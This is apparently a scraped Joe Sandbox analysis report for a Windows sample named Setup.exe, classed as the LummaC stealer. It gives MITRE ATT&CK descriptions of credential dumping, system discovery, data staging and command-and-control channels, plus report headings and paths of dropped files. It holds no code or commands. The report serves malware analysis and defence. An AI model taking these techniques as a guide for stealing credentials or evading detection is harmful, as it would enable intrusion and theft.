Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\5f168990

C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gcyw113y.ivv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i23x0154.uye.ps1

C:\Users\user\AppData\Local\Temp\is-DTHVM.tmp\_isetup\_isdecmp.dll

C:\Users\user\AppData\Local\Temp\is-DTHVM.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp

C:\Users\user\AppData\Local\Temp\is-SC3PP.tmp\_isetup\_isdecmp.dll

C:\Users\user\AppData\Local\Temp\is-SC3PP.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp

C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

C:\Users\user\AppData\Roaming\ColorStreamLib\is-FS5QT.tmp

Static File Info

Windows Analysis Report
#Setup.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre